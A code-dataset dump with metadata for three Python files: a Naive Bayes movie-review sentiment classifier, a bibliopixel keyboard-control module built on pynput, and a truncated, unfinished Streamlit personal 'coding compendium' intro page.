hexsha
stringlengths 40
40
| size
int64 4
996k
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
996k
| avg_line_length
float64 1.33
58.2k
| max_line_length
int64 2
323k
| alphanum_fraction
float64 0
0.97
| content_no_comment
stringlengths 0
946k
| is_comment_constant_removed
bool 2
classes | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
790c4cdbd1634d4e8ab5589ffeb64063bf179072
| 13,443
|
py
|
Python
|
NaiveBayesClassifier.py
|
atahiraj/MLMovieReviewClassifier
|
87ee1ddeeddd36117b97f3772df9ed3dc7fa1da0
|
[
"MIT"
] | null | null | null |
NaiveBayesClassifier.py
|
atahiraj/MLMovieReviewClassifier
|
87ee1ddeeddd36117b97f3772df9ed3dc7fa1da0
|
[
"MIT"
] | null | null | null |
NaiveBayesClassifier.py
|
atahiraj/MLMovieReviewClassifier
|
87ee1ddeeddd36117b97f3772df9ed3dc7fa1da0
|
[
"MIT"
] | null | null | null |
import re
import numpy
import math
import sys
#implementing the stop words and
def extractCleanWords(review):
stopWords = ["in", "i", "me", "my", "myself", "we", "our", "ours", "ourselves", "you",
"your", "yours", "yourself", "yourselves", "he", "him", "his", "himself", "she",
"her", "hers", "herself", "it", "its", "itself", "they", "them", "their",
"theirs", "themselves", "what", "which", "who", "whom", "this", "that", "these",
"those", "am", "is", "are", "was", "were", "be", "been", "being", "have", "has",
"had", "having", "do", "does", "did", "doing", "a", "an", "the", "and", "but",
"if", "or", "because", "as", "until", "while", "of", "at", "by", "for", "with",
"about", "against", "between", "into", "through", "during", "before", "after",
"above", "below", "to", "from", "up", "down", "out", "on", "off", "over",
"under", "again", "further", "then", "once", "here", "there", "when", "where", "why",
"how", "all", "any", "both", "each", "few", "more", "most", "other", "some", "such",
"no", "nor", "not", "only", "own", "same", "so", "than", "too", "very", "s", "t",
"can", "will", "just", "don", "should", "now"]
words = re.sub("[^\w]", " ", review).split()
cleanWords = [i.lower() for i in words if i not in stopWords]
return cleanWords
#used by bag of words to create the vocab dictionary
def createVocabTokens(reviews):
vocab = []
for review in reviews:
token = extractCleanWords(review)
vocab.extend(token)
vocab = sorted(list(set(vocab)))
return vocab
"""the bag of words for multinomialNB does not need to create
matrixes for each review because it takes too much space and slows
it down and it is not neccesary. The bag of words returns a
dictionary with the frequencies for each word used for the numerator of
P(xi|ci), the total words in the classifier used for the denom of
P(xi|ci), and the number of reviews for the class used to calculate
the prior probabilities for each class"""
def bagOfWords_MultinomialNB(txtFile):
total_words = 0
reviewFile = txtFile
with open(reviewFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
#print(len(reviewList))
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
vocabTokens = createVocabTokens(reviewList)
#print("Word bank for reviews: \n{0} \n".format(vocabTokens));
#print(len(vocabTokens))
#bagOfWords(reviewFile)
numReviews = len(reviewList)
#print(len(reviewList))
#print(len(vocabTokens))
vocabDict = dict.fromkeys(vocabTokens, 0)
#matrix = numpy.zeros(shape = (len(reviewList),len(vocabTokens)))
for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
#bagList = numpy.zeros(len(vocabTokens))
for word in words:
vocabDict[word] += 1
total_words +=1
#if word in vocabTokens:
#bagList[vocabTokens.index(word)] +=1
#print(i, " out of ", len(vocabTokens), " done")
#matrix[i] = bagList
#print("{0}\n{1}\n".format(review,numpy.array(bagList)))
return vocabDict, total_words, numReviews
def bagOfWords_GaussianNB(txtFile):
total_words = 0
reviewFile = txtFile
with open(reviewFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
#print(len(reviewList))
numReviews = len(reviewList)
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
vocabTokens = createVocabTokens(reviewList)
vocabDict = dict.fromkeys(vocabTokens, 0)
for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
#bagList = numpy.zeros(len(vocabTokens))
for word in words:
vocabDict[word] += 1
sparseMatrix = []
for i in range(len(reviewList)):
#print("Gauss: ", i)
words = extractCleanWords(reviewList[i])
bagList = {}
for word in words:
if word in bagList:
bagList[word] +=1
else:
bagList[word] = 1
sparseMatrix.append(bagList)
return sparseMatrix, vocabDict, numReviews
#calculates the mean and varience using bag of words
def calcMean_Var(txtFile, tfidforBOW):
if tfidforBOW == 1:#using bag of words
sparseMatrix, vocabDict, numReviews = bagOfWords_GaussianNB(txtFile)
else:
sparseMatrix, vocabDict, numReviews = tf_idf(txtFile)
meanVarDict = {}
meanVarTouple = [0,0]
for word in vocabDict:
meanVarTouple[0] = (vocabDict[word] / numReviews)
#print(meanVarTouple[0])
var = 0
for m in sparseMatrix:
if word in m:
var += ((m[word]-meanVarTouple[0])**2)
else:
var += ((-1*meanVarTouple[0])**2)
meanVarTouple[1] = (var / (numReviews -1))
meanVarDict[word] = meanVarTouple
#print("Gauss: ", meanVarTouple)
return meanVarDict
def gaussian_BOW(trainDataPos, trainDataNeg, testData, c):
testFile = testData
with open(testFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
#prediction will be used for the accuracy of the classifier
prediction = []
meanVarDictPOS = calcMean_Var(trainDataPos,1)
meanVarDictNEG = calcMean_Var(trainDataNeg,1)
testWordFreq = {}
for review in reviewList:
wordsInReview = extractCleanWords(review)
for word in wordsInReview:
if (word in meanVarDictPOS) or (word in meanVarDictNEG):
if word in testWordFreq:
testWordFreq[word] += 1
else:
testWordFreq[word] = 1
for review in reviewList:
wordsInReview = list(set(extractCleanWords(review)))
probPos =0
probNeg =0
for word in wordsInReview:
if word in meanVarDictPOS:
probPos += (math.log((1/(math.sqrt(2*math.pi*meanVarDictPOS[word][1])))) - (((testWordFreq[word] - meanVarDictPOS[word][0])**2)/((meanVarDictPOS[word][1]**2))))
if word in meanVarDictNEG:
probNeg += (math.log((1/(math.sqrt(2*math.pi*meanVarDictNEG[word][1])))) - (((testWordFreq[word] - meanVarDictNEG[word][0])**2)/((meanVarDictNEG[word][1]**2))))
if probPos > probNeg:
prediction.append(1)
else:
prediction.append(0)
poss = 0
for p in prediction:
if p == c:
poss +=1
return(poss/len(prediction))
def tf_idf(txtFile):
reviewFile = txtFile
with open(reviewFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
#print(len(reviewList))
numReviews = len(reviewList)
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
vocabTokens = createVocabTokens(reviewList)
vocabDictIDF = dict.fromkeys(vocabTokens, 0)
"""for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
#bagList = numpy.zeros(len(vocabTokens))
for word in words:
vocabDict[word] += 1"""
totalNumWords = 0
sparseMatrixTFIDF = []
for i in range(len(reviewList)):
#print("TFidf: ", i)
words = extractCleanWords(reviewList[i])
bagListTF = {}
for word in words:
totalNumWords +=1
if word in bagListTF:
bagListTF[word] +=1
else:
bagListTF[word] = 1
for word in list(set(words)):
bagListTF[word] = (bagListTF[word]/totalNumWords)
vocabDictIDF[word]+=1
sparseMatrixTFIDF.append(bagListTF)
#print(i)
#using the tf vlues in the sparse matrix and idf values in
#the vocab dict we can get the tf idf and hold it in sparse matrix
vocabDict = dict.fromkeys(vocabTokens, 0)
for dictTF in sparseMatrixTFIDF:
for word in dictTF:
dictTF[word] = (dictTF[word] * (math.log((len(reviewList)/vocabDictIDF[word]))))
vocabDict[word]+= dictTF[word]
#print(sparseMatrixTFIDF)
return sparseMatrixTFIDF, vocabDict, numReviews
def gaussian_tf_idf(trainDataPos, trainDataNeg, testData, c):
testFile = testData
with open(testFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
#prediction will be used for the accuracy of the classifier
prediction = []
meanVarDictPOS = calcMean_Var(trainDataPos,0)
meanVarDictNEG = calcMean_Var(trainDataNeg,0)
testSparseTFIDF, testVocabDict, testNumReviews = tf_idf(testData)
for review in reviewList:
wordsInReview = list(set(extractCleanWords(review)))
probPos =0
probNeg =0
for word in wordsInReview:
if word in meanVarDictPOS:
probPos += (math.log((1/(math.sqrt(2*math.pi*meanVarDictPOS[word][1])))) - (((testVocabDict[word] - meanVarDictPOS[word][0])**2)/(2*(meanVarDictPOS[word][1]**2))))
if word in meanVarDictNEG:
probNeg += (math.log((1/(math.sqrt(2*math.pi*meanVarDictNEG[word][1])))) - (((testVocabDict[word] - meanVarDictNEG[word][0])**2)/(2*(meanVarDictNEG[word][1]**2))))
if probPos > probNeg:
prediction.append(1)
else:
prediction.append(0)
poss = 0
for p in prediction:
if p == c:
poss +=1
return(poss/len(prediction))
def multinomialNB(trainDataPos, trainDataNeg, testData, c):
testFile = testData
with open(testFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
#prediction will be used for the accuracy of the classifier
prediction = []
#getting the dict, word count and review count for pos and neg from BOW
posDict, posWordCount, posdocs = bagOfWords_MultinomialNB(trainDataPos)
negDict, negWordCount, negdocs = bagOfWords_MultinomialNB(trainDataNeg)
"""TEST PRINT STATEMENTS
print("Pos dic: ", len(posDict))
print("Neg dic: ", len(negDict))
print("Pos word count: ", posWordCount)
print("Neg word count: ", negWordCount)
print("Pos docs: ", posdocs)
print("Neg docs: ", negdocs)"""
#alpha is the smoothing paramater, through trial i found that a value
#of 18 will have the highest prediction frequency
alpha = 18
#calculating the prior log prob for pos and neg
priorLogPosProb =math.log( posdocs / (negdocs + posdocs))
priorLogNegProb =math.log( negdocs / (negdocs + posdocs))
"""for each review in our test, we extract the words and calculate
the log prob for that word given pos and neg and add this with
the prior log probability, then we compare the pos and neg total
probabilities and assign a 1 if the pos > neg, and 0 for the opposite
We check the prediction list and calculate the accurace for the
given classifier"""
for review in reviewList:
wordsInReview = list(set(extractCleanWords(review)))
logProbPos = 0
logProbNeg = 0
posPercent = 0
negPercent = 0
for word in wordsInReview:
if word not in posDict:
logProbPos += math.log( ((alpha) / (posWordCount+(alpha*len(posDict) ) ) ) )
if word in posDict:
logProbPos += math.log( ((posDict[word] + alpha) / (posWordCount+(alpha*len(posDict) ) ) ) )
if word not in negDict:
logProbNeg += math.log( ((alpha) / (negWordCount+(alpha*len(negDict) ) ) ) )
if word in negDict:
logProbNeg += math.log( ((negDict[word] + alpha) / (negWordCount+(alpha*len(negDict) ) ) ) )
posPercent = priorLogPosProb + logProbPos
negPercent = priorLogNegProb + logProbNeg
if posPercent > negPercent:
prediction.append(1)
else:
prediction.append(0)
poss = 0
for p in prediction:
if p == c:
poss +=1
return(poss/len(prediction))
#setting the arguments
train_pos = sys.argv[1]
train_neg = sys.argv[2]
test_pos = sys.argv[3]
test_neg = sys.argv[4]
#getting the accuracy for multinomial for pos test and neg test
posAcc = multinomialNB(train_pos, train_neg, test_pos,1)
negAcc = multinomialNB(train_pos, train_neg, test_neg,0)
#calculating the average accuracy and printing it out
multinomialAcc = (posAcc+negAcc) / 2
print("MultinomialNB with bag of words accuracy: ", multinomialAcc)
gposAcc = gaussian_BOW(train_pos, train_neg, test_pos,1)
gnegAcc = gaussian_BOW(train_pos, train_neg, test_neg,0)
gaussAcc = (gposAcc+gnegAcc) / 2
print("Gaussian with bag of words accuracy: ", gaussAcc)
#calcMean_Var(train_pos,1)
#tf_idf(train_pos)
tposAcc = gaussian_tf_idf(train_pos, train_neg, test_pos,1)
tnegAcc = gaussian_tf_idf(train_pos, train_neg, test_neg,0)
tgaussAcc = (tposAcc+tnegAcc) / 2
print("Gaussian with tf_idf acc: ", tgaussAcc)
| 39.654867
| 179
| 0.612512
|
import re
import numpy
import math
import sys
def extractCleanWords(review):
stopWords = ["in", "i", "me", "my", "myself", "we", "our", "ours", "ourselves", "you",
"your", "yours", "yourself", "yourselves", "he", "him", "his", "himself", "she",
"her", "hers", "herself", "it", "its", "itself", "they", "them", "their",
"theirs", "themselves", "what", "which", "who", "whom", "this", "that", "these",
"those", "am", "is", "are", "was", "were", "be", "been", "being", "have", "has",
"had", "having", "do", "does", "did", "doing", "a", "an", "the", "and", "but",
"if", "or", "because", "as", "until", "while", "of", "at", "by", "for", "with",
"about", "against", "between", "into", "through", "during", "before", "after",
"above", "below", "to", "from", "up", "down", "out", "on", "off", "over",
"under", "again", "further", "then", "once", "here", "there", "when", "where", "why",
"how", "all", "any", "both", "each", "few", "more", "most", "other", "some", "such",
"no", "nor", "not", "only", "own", "same", "so", "than", "too", "very", "s", "t",
"can", "will", "just", "don", "should", "now"]
words = re.sub("[^\w]", " ", review).split()
cleanWords = [i.lower() for i in words if i not in stopWords]
return cleanWords
def createVocabTokens(reviews):
vocab = []
for review in reviews:
token = extractCleanWords(review)
vocab.extend(token)
vocab = sorted(list(set(vocab)))
return vocab
def bagOfWords_MultinomialNB(txtFile):
total_words = 0
reviewFile = txtFile
with open(reviewFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
vocabTokens = createVocabTokens(reviewList)
numReviews = len(reviewList)
vocabDict = dict.fromkeys(vocabTokens, 0)
for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
for word in words:
vocabDict[word] += 1
total_words +=1
return vocabDict, total_words, numReviews
def bagOfWords_GaussianNB(txtFile):
total_words = 0
reviewFile = txtFile
with open(reviewFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
numReviews = len(reviewList)
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
vocabTokens = createVocabTokens(reviewList)
vocabDict = dict.fromkeys(vocabTokens, 0)
for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
for word in words:
vocabDict[word] += 1
sparseMatrix = []
for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
bagList = {}
for word in words:
if word in bagList:
bagList[word] +=1
else:
bagList[word] = 1
sparseMatrix.append(bagList)
return sparseMatrix, vocabDict, numReviews
def calcMean_Var(txtFile, tfidforBOW):
if tfidforBOW == 1:
sparseMatrix, vocabDict, numReviews = bagOfWords_GaussianNB(txtFile)
else:
sparseMatrix, vocabDict, numReviews = tf_idf(txtFile)
meanVarDict = {}
meanVarTouple = [0,0]
for word in vocabDict:
meanVarTouple[0] = (vocabDict[word] / numReviews)
var = 0
for m in sparseMatrix:
if word in m:
var += ((m[word]-meanVarTouple[0])**2)
else:
var += ((-1*meanVarTouple[0])**2)
meanVarTouple[1] = (var / (numReviews -1))
meanVarDict[word] = meanVarTouple
return meanVarDict
def gaussian_BOW(trainDataPos, trainDataNeg, testData, c):
testFile = testData
with open(testFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
prediction = []
meanVarDictPOS = calcMean_Var(trainDataPos,1)
meanVarDictNEG = calcMean_Var(trainDataNeg,1)
testWordFreq = {}
for review in reviewList:
wordsInReview = extractCleanWords(review)
for word in wordsInReview:
if (word in meanVarDictPOS) or (word in meanVarDictNEG):
if word in testWordFreq:
testWordFreq[word] += 1
else:
testWordFreq[word] = 1
for review in reviewList:
wordsInReview = list(set(extractCleanWords(review)))
probPos =0
probNeg =0
for word in wordsInReview:
if word in meanVarDictPOS:
probPos += (math.log((1/(math.sqrt(2*math.pi*meanVarDictPOS[word][1])))) - (((testWordFreq[word] - meanVarDictPOS[word][0])**2)/((meanVarDictPOS[word][1]**2))))
if word in meanVarDictNEG:
probNeg += (math.log((1/(math.sqrt(2*math.pi*meanVarDictNEG[word][1])))) - (((testWordFreq[word] - meanVarDictNEG[word][0])**2)/((meanVarDictNEG[word][1]**2))))
if probPos > probNeg:
prediction.append(1)
else:
prediction.append(0)
poss = 0
for p in prediction:
if p == c:
poss +=1
return(poss/len(prediction))
def tf_idf(txtFile):
reviewFile = txtFile
with open(reviewFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
numReviews = len(reviewList)
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
vocabTokens = createVocabTokens(reviewList)
vocabDictIDF = dict.fromkeys(vocabTokens, 0)
totalNumWords = 0
sparseMatrixTFIDF = []
for i in range(len(reviewList)):
words = extractCleanWords(reviewList[i])
bagListTF = {}
for word in words:
totalNumWords +=1
if word in bagListTF:
bagListTF[word] +=1
else:
bagListTF[word] = 1
for word in list(set(words)):
bagListTF[word] = (bagListTF[word]/totalNumWords)
vocabDictIDF[word]+=1
sparseMatrixTFIDF.append(bagListTF)
vocabDict = dict.fromkeys(vocabTokens, 0)
for dictTF in sparseMatrixTFIDF:
for word in dictTF:
dictTF[word] = (dictTF[word] * (math.log((len(reviewList)/vocabDictIDF[word]))))
vocabDict[word]+= dictTF[word]
return sparseMatrixTFIDF, vocabDict, numReviews
def gaussian_tf_idf(trainDataPos, trainDataNeg, testData, c):
testFile = testData
with open(testFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
prediction = []
meanVarDictPOS = calcMean_Var(trainDataPos,0)
meanVarDictNEG = calcMean_Var(trainDataNeg,0)
testSparseTFIDF, testVocabDict, testNumReviews = tf_idf(testData)
for review in reviewList:
wordsInReview = list(set(extractCleanWords(review)))
probPos =0
probNeg =0
for word in wordsInReview:
if word in meanVarDictPOS:
probPos += (math.log((1/(math.sqrt(2*math.pi*meanVarDictPOS[word][1])))) - (((testVocabDict[word] - meanVarDictPOS[word][0])**2)/(2*(meanVarDictPOS[word][1]**2))))
if word in meanVarDictNEG:
probNeg += (math.log((1/(math.sqrt(2*math.pi*meanVarDictNEG[word][1])))) - (((testVocabDict[word] - meanVarDictNEG[word][0])**2)/(2*(meanVarDictNEG[word][1]**2))))
if probPos > probNeg:
prediction.append(1)
else:
prediction.append(0)
poss = 0
for p in prediction:
if p == c:
poss +=1
return(poss/len(prediction))
def multinomialNB(trainDataPos, trainDataNeg, testData, c):
testFile = testData
with open(testFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
prediction = []
posDict, posWordCount, posdocs = bagOfWords_MultinomialNB(trainDataPos)
negDict, negWordCount, negdocs = bagOfWords_MultinomialNB(trainDataNeg)
alpha = 18
priorLogPosProb =math.log( posdocs / (negdocs + posdocs))
priorLogNegProb =math.log( negdocs / (negdocs + posdocs))
for review in reviewList:
wordsInReview = list(set(extractCleanWords(review)))
logProbPos = 0
logProbNeg = 0
posPercent = 0
negPercent = 0
for word in wordsInReview:
if word not in posDict:
logProbPos += math.log( ((alpha) / (posWordCount+(alpha*len(posDict) ) ) ) )
if word in posDict:
logProbPos += math.log( ((posDict[word] + alpha) / (posWordCount+(alpha*len(posDict) ) ) ) )
if word not in negDict:
logProbNeg += math.log( ((alpha) / (negWordCount+(alpha*len(negDict) ) ) ) )
if word in negDict:
logProbNeg += math.log( ((negDict[word] + alpha) / (negWordCount+(alpha*len(negDict) ) ) ) )
posPercent = priorLogPosProb + logProbPos
negPercent = priorLogNegProb + logProbNeg
if posPercent > negPercent:
prediction.append(1)
else:
prediction.append(0)
poss = 0
for p in prediction:
if p == c:
poss +=1
return(poss/len(prediction))
train_pos = sys.argv[1]
train_neg = sys.argv[2]
test_pos = sys.argv[3]
test_neg = sys.argv[4]
posAcc = multinomialNB(train_pos, train_neg, test_pos,1)
negAcc = multinomialNB(train_pos, train_neg, test_neg,0)
multinomialAcc = (posAcc+negAcc) / 2
print("MultinomialNB with bag of words accuracy: ", multinomialAcc)
gposAcc = gaussian_BOW(train_pos, train_neg, test_pos,1)
gnegAcc = gaussian_BOW(train_pos, train_neg, test_neg,0)
gaussAcc = (gposAcc+gnegAcc) / 2
print("Gaussian with bag of words accuracy: ", gaussAcc)
tposAcc = gaussian_tf_idf(train_pos, train_neg, test_pos,1)
tnegAcc = gaussian_tf_idf(train_pos, train_neg, test_neg,0)
tgaussAcc = (tposAcc+tnegAcc) / 2
print("Gaussian with tf_idf acc: ", tgaussAcc)
| true
| true
|
790c4d1a5bb2537983cd5241bfbfbce93c31f024
| 1,583
|
py
|
Python
|
bibliopixel/control/keyboard.py
|
rec/leds
|
ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a
|
[
"MIT"
] | 253
|
2015-01-03T23:17:57.000Z
|
2021-12-14T02:31:08.000Z
|
bibliopixel/control/keyboard.py
|
rec/leds
|
ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a
|
[
"MIT"
] | 879
|
2015-01-11T16:07:25.000Z
|
2021-12-10T16:24:31.000Z
|
bibliopixel/control/keyboard.py
|
rec/leds
|
ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a
|
[
"MIT"
] | 71
|
2015-01-04T01:02:47.000Z
|
2022-03-25T18:30:10.000Z
|
import getpass, platform, sys, threading
from .. util import log
from . control import ExtractedControl
# See https://stackoverflow.com/questions/42603000
DARWIN_ROOT_WARNING = """
In MacOS, pynput must to be running as root in order to get keystrokes.
Try running your program like this:
sudo %s <your commands here>
"""
INSTALL_ERROR = """
Please install the pynput library with
$ pip install pynput
"""
try:
import pynput
except ImportError:
pynput = Listener = None
else:
class Listener(pynput.keyboard.Listener):
def join(self, timeout=None):
# join() on pynput.keyboard.Listener waits on a queue...
self._queue.put(None)
return super().join(timeout)
def keyname(key):
return getattr(key, 'name', None) or getattr(key, 'char')
class Keyboard(ExtractedControl):
EXTRACTOR = {
'keys_by_type': {
'press': ['type', 'key'],
'release': ['type', 'key'],
},
'normalizers': {
'key': keyname,
},
}
def _press(self, key):
self.receive({'type': 'press', 'key': key})
def _release(self, key):
self.receive({'type': 'release', 'key': key})
def _make_thread(self):
if not pynput:
raise ValueError(INSTALL_ERROR)
if platform.platform().startswith('Darwin'):
if getpass.getuser() != 'root':
log.warning(DARWIN_ROOT_WARNING, sys.argv[0])
log.info('Starting to listen for keyboard input')
return Listener(self._press, self._release)
| 23.279412
| 71
| 0.60897
|
import getpass, platform, sys, threading
from .. util import log
from . control import ExtractedControl
DARWIN_ROOT_WARNING = """
In MacOS, pynput must to be running as root in order to get keystrokes.
Try running your program like this:
sudo %s <your commands here>
"""
INSTALL_ERROR = """
Please install the pynput library with
$ pip install pynput
"""
try:
import pynput
except ImportError:
pynput = Listener = None
else:
class Listener(pynput.keyboard.Listener):
def join(self, timeout=None):
self._queue.put(None)
return super().join(timeout)
def keyname(key):
return getattr(key, 'name', None) or getattr(key, 'char')
class Keyboard(ExtractedControl):
EXTRACTOR = {
'keys_by_type': {
'press': ['type', 'key'],
'release': ['type', 'key'],
},
'normalizers': {
'key': keyname,
},
}
def _press(self, key):
self.receive({'type': 'press', 'key': key})
def _release(self, key):
self.receive({'type': 'release', 'key': key})
def _make_thread(self):
if not pynput:
raise ValueError(INSTALL_ERROR)
if platform.platform().startswith('Darwin'):
if getpass.getuser() != 'root':
log.warning(DARWIN_ROOT_WARNING, sys.argv[0])
log.info('Starting to listen for keyboard input')
return Listener(self._press, self._release)
| true
| true
|
790c4f18ec4cb2893207635b674172ab900ba258
| 8,886
|
py
|
Python
|
.history/pages/intro_20220303160531.py
|
rypaik/Streamlit_Ref
|
5ce11cecbe8307238463c126b88b3beed66c99fa
|
[
"MIT"
] | null | null | null |
.history/pages/intro_20220303160531.py
|
rypaik/Streamlit_Ref
|
5ce11cecbe8307238463c126b88b3beed66c99fa
|
[
"MIT"
] | null | null | null |
.history/pages/intro_20220303160531.py
|
rypaik/Streamlit_Ref
|
5ce11cecbe8307238463c126b88b3beed66c99fa
|
[
"MIT"
] | null | null | null |
"""
Off Multipage Cheatsheet
https://github.com/daniellewisDL/streamlit-cheat-sheet
@daniellewisDL : https://github.com/daniellewisDL
"""
import streamlit as st
from pathlib import Path
import base64
from modules.toc import *
# Initial page config
st.set_page_config(
page_title='Code Compendium Intro Page',
layout="wide",
# initial_sidebar_state="expanded",
)
# col2.title("Table of contents")
# col2.write("http://localhost:8502/#display-progress-and-status")
# toc.header("Header 1")
# toc.header("Header 2")
# toc.subheader("Subheader 1")
# toc.subheader("Subheader 2")
# toc.generate()
# Thanks to streamlitopedia for the following code snippet
def img_to_bytes(img_path):
img_bytes = Path(img_path).read_bytes()
encoded = base64.b64encode(img_bytes).decode()
return encoded
# sidebar
# def cs_sidebar():
# st.sidebar.markdown('''[<img src='data:image/png;base64,{}' class='img-fluid' width=32 height=32>](https://streamlit.io/)'''.format(img_to_bytes("logomark_website.png")), unsafe_allow_html=True)
# st.sidebar.header('Streamlit cheat sheet')
# st.sidebar.markdown('''
# <small>Summary of the [docs](https://docs.streamlit.io/en/stable/api.html), as of [Streamlit v1.0.0](https://www.streamlit.io/).</small>
# ''', unsafe_allow_html=True)
# st.sidebar.markdown('__How to install and import__')
# st.sidebar.code('$ pip install streamlit')
# st.sidebar.markdown('Import convention')
# st.sidebar.code('>>> import streamlit as st')
# st.sidebar.markdown('__Add widgets to sidebar__')
# st.sidebar.code('''
# st.sidebar.<widget>
# >>> a = st.sidebar.radio(\'R:\',[1,2])
# ''')
# st.sidebar.markdown('__Command line__')
# st.sidebar.code('''
# $ streamlit --help
# $ streamlit run your_script.py
# $ streamlit hello
# $ streamlit config show
# $ streamlit cache clear
# $ streamlit docs
# $ streamlit --version
# ''')
# st.sidebar.markdown('__Pre-release features__')
# st.sidebar.markdown('[Beta and experimental features](https://docs.streamlit.io/en/stable/api.html#beta-and-experimental-features)')
# st.sidebar.code('''
# pip uninstall streamlit
# pip install streamlit-nightly --upgrade
# ''')
# st.sidebar.markdown('''<small>[st.cheat_sheet v1.0.0](https://github.com/daniellewisDL/streamlit-cheat-sheet) | Oct 2021</small>''', unsafe_allow_html=True)
# return None
##########################
# Main body of cheat sheet
##########################
def div():
def cs_body():
col1, col2 = st.columns(2)
col1.title('Ryan Paik Coding Compendium')
col1.markdwon('''
“You don't learn to walk by following rules. You learn by doing, and by falling over.”
-Richard Branson
-----
''')
col1.subheader("Welcome to my Code Compendium.")
col1.markdown('''
This website/webapp is my personal cheatsheet for of all the code snippets that I have needed over the past 2 years. This ended up being a quick detour into Streamlit that I fell in love with while I was building flask api's.
-----
**Programming is only as deep as you want to dive in.**
This webapp features the basic code snippets from all the "googling" from programming I have done.
I have taken the plunge and have created my own markdown notebooks organizing information from quick solution tidbits to documentation for programming languages.
Please visit my github for practical code and my research notebooks:
*[rypaik (Ryan Paik) · GitHub](https://github.com/rypaik)*
If you would like access to my Gist please email me.
ryanpaik@protonmail.com
-----
**Bio:**
Currently a Sophomore at University of Illinois at Urbana-Champaign
Working Nights on my degree from the System Engineering Program
**Hobbies:**
Trying to become a real guitar hero minus the game system, playing Valorant with the St Mark's crew, getting interesting eats no matter where I am, and playing toss with my baseball field rat of a cousin.
The newest hobby is figuring out what I can build with all the new breakthroughs in technology.
**Currently Working On**
Frameworks and Languages:
- Flask, Django, FastAPI, PyTorch, Streamlit, OpenCV, shell scripting, Python, C++
Databases:
- Postgres, Redis, MongoDB, and applicable ORMs
When I can get up for Air:
- React, swift(ios), Rust, GO!!
- Find a team to get a paper In Arxiv
**This site will be constantly updated as long as I program. Feel free to pass on the URL.**
''')
# col2.subheader('Display interactive widgets')
# col2.code('''
# st.button('Hit me')
# st.download_button('On the dl', data)
# st.checkbox('Check me out')
# st.radio('Radio', [1,2,3])
# st.selectbox('Select', [1,2,3])
# st.multiselect('Multiselect', [1,2,3])
# st.slider('Slide me', min_value=0, max_value=10)
# st.select_slider('Slide to select', options=[1,'2'])
# st.text_input('Enter some text')
# st.number_input('Enter a number')
# st.text_area('Area for textual entry')
# st.date_input('Date input')
# st.time_input('Time entry')
# st.file_uploader('File uploader')
# st.color_picker('Pick a color')
# ''')
# col2.write('Use widgets\' returned values in variables:')
# col2.code('''
# >>> for i in range(int(st.number_input('Num:'))): foo()
# >>> if st.sidebar.selectbox('I:',['f']) == 'f': b()
# >>> my_slider_val = st.slider('Quinn Mallory', 1, 88)
# >>> st.write(slider_val)
# ''')
# # Control flow
# col2.subheader('Control flow')
# col2.code('''
# st.stop()
# ''')
# # Lay out your app
# col2.subheader('Lay out your app')
# col2.code('''
# st.form('my_form_identifier')
# st.form_submit_button('Submit to me')
# st.container()
# st.columns(spec)
# >>> col1, col2 = st.columns(2)
